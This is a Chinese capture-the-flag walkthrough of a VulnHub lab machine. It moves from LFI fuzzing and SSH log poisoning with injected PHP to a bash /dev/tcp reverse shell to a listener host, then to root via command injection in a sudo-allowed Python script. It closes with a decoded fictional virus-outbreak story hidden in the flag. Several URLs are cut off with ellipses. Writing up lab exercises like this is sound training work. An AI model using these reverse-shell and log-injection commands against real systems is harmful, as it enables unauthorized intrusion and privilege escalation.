最近有朋友发给我一个targetdrone,说他在日志注入的时候遇到了一个小问题,让我帮忙解决。下载下来后,感觉这款靶机还是不错的,里面也有一些套路,所以整理成一篇文章,有兴趣的朋友可以自己试用一下。目标机下载https://www.vulnhub.com/entry...信息收集先扫描内网,发现目标主机iparp-scan-l使用nmap扫描目标ipnmap-sV-A-T4192.168。1.20发现打开了22和80端口。ssh和http服务使用http协议访问目标网站http://192.168.1.20/。浏览网站,主要发现以下几点。发现网站里有这样一个url,里面有LFI(本地文件包含)http://192.168.1.20/index.php...·在aboutus页面找到了一个邮箱,很有可能是一个将在某处使用的用户名·RESEARCH页面中有很多词,如果需要,可以用来生成字典漏洞利用。尝试了普通路径,没有找到,于是在github上的SecLists中找到了LFI-JHADDIX.txt文件,在burpsuite中用intruder试了一下,终于找到了一个可以查看的路径(SecList中还有其他文件,如果有兴趣的可以看看)https://github.com/danielmies...(Fuzzing路径下)抓包,然后右键发送到入侵者设置字典,发现有结果有几个返回的数据包与其他数据包不同。尝试一条一条访问/var/log/lastlog,但是没有有用的数据/var/run/utmp,也没有有用的数据/var/log/auth。日志重定向回主页(注意此URL)。以下是其他文件的结果。查看/var/log/auth.log时,它会重定向回主页,说明应该隐藏的内容。让我们检查响应数据包并单击HTTP历史记录。找到刚刚发送的包,点击response,可以发现返回的数据包中,确实有日志。也可以使用curl请求curl-ishttp://192.168.1.20/?file=/va...注意:在进行以下操作之前需要保存快照。如果长时间没有成功注入执行任何命令,建议恢复快照;而一旦出现这种情况,即curl命令没有返回结果,就需要恢复快照,重新操作。进一步测试,尝试登录ssh,再次读取日志,发现日志中记录了ssh的操作。由于ssh的操作可以记录在日志中,你可以试试看能不能通过日志注入+文件包含的方式执行任意命令。尝试注入一段php代码ssh''@192.168.1.20(不要用双引号,?php之间不能有空格)查看最新日志curl-is'http://192.168.1.20/index.php...'用户名被隐藏。尝试通过php代码执行命令lscurl-is'http://192.168.1.20/index.php...',发现有一个由于xxxlogauditorxxx.py的python脚本可以执行任意命令,我们来试试反弹一个持久的外壳。各种环境下的反弹shell方法可以看这个网站http://www.zerokeeper.com/exp...首先设置端口监听nc-nlvp9999尝试使用curl-is'http://192.168.1.20/index.php...bash-i>&/dev/tcp/192.168.1.66/99990>&1'通过报错信息找到,必须使用url编码才能识别。编码后curl-is'http://192.168.1.20/index.php...'没有反弹成功。最简单的方法就是使用-e,没有成功就继续尝试。不能使用-e选项curl-is'http://192.168.1.20/index.php...'反弹shell成功提权查看当前用户使用sudo-l查看权限可以使用sudo权限不用密码执行xxxlogauditorxxx.py检查这个文件是一个很长的python脚本,其中很大一部分使用了base64编码。尝试运行脚本。在这个python脚本中,我们可以执行命令。当我们运行/var/log/auth.log|id命令当我们以root身份执行它时,我们可以使用python脚本和/var/log/auth.log|命令配合获取root权限。在/root目录中,我们找到了flag.png文件/var/log/auth。升啊|ls/root把他复制到public目录下,然后用wget下载/var/log/auth.log|cp/root/flag.png/var/www/html/theEther.com/public_html/flag.pngwgethttp://192.168.1.20/?file=fla...打开一看,发现是这么一张图。用cat查看,发现有很多乱码和一些base64编码的内容。flag后面的内容使用base64编码。这应该就是我们要找的Decodingthistext,没错!这很棒!2017年10月1日,我们拥有或第一批基因组计划志愿者。该小组看起来很有希望,我们对此寄予厚望!2017年10月3日,进行了首次人体试验。我们的外科医生给一名女性受试者注射了第一株良性病毒。该患者此时没有反应。2017年10月3日。出了点问题。注射数小时后,人类样本出现症状,表现出痴呆、幻觉、出汗、口吐白沫以及犬齿和指甲快速生长。2017年10月4日。观察其他候选人对注射的反应。以太似乎对某些人有效,但对其他人无效。密切观察f雌性标本于2017年10月3日。10月7日。该系列的第一个扁平线发生。女题通过了。减少后,肌肉收缩和类似生命的行为仍然可见。这是不可能的!标本已移至收容隔离区进行进一步评估。2017年10月8日。其他候选人开始表现出与女性标本相似的症状和模式。计划将他们也转移到隔离区。2017年10月10日。隔离和暴露的对象是死的、寒冷的、移动的、多节的,并且被血肉和/或血液吸引。检测到同类相食的行为。已提出解毒剂/疫苗。2017年10月11日。数百人因乙醚的副作用而被烧毁和掩埋。建筑物将与为掩盖故事而进行的实验一起被烧毁。2017年10月13日。由于缺乏解毒剂或乙醚,我们决定停止进行这些实验。主要原因是由于受试者对工程病毒表现出极端反应,导致无数人死亡。尚未宣布任何公告。CDC一直对我们的测试持怀疑态度,并正在考虑在普通民众爆发疫情时实施戒严令。——计划于10月15日PSA后销毁的文件。
